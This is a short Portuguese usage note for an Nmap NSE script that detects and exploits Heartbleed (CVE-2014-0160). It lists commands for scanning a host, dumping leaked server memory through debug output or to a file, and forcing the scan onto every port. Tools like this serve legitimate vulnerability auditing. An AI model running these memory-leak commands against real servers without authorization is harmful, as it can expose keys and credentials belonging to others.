
Nmap NSE script que descobre/explora Heartbleed/CVE-2014-0160.
Script NSE do Nmap que descobre/explora Heartbleed/CVE-2014-0160. Este script é agora basicamente o que Patrik Karlsson escreveu com algumas pequenas alterações portadas do meu próprio script.
Isto é executado em todas as portas SSL, FTP, SMTP e/ou XMPP.
$ nmap --script ./openssl-heartbleed.nse host.tld
O despejo de memória vazada é ativado aumentando o nível de depuração do Nmap através da flag -d.
$ nmap -d --script=./openssl-heartbleed.nse host.tld
$ nmap --script ./ssl-heartbleed.nse --script-args 'ssl-heartbleed.dumpfile=/tmp/heartbleed.dump' host.tld
Força o script a ser executado em cada porta, independentemente de o serviço ter sido detectado ou não.
$ nmap --script +./ssl-heartbleed.nse host.tld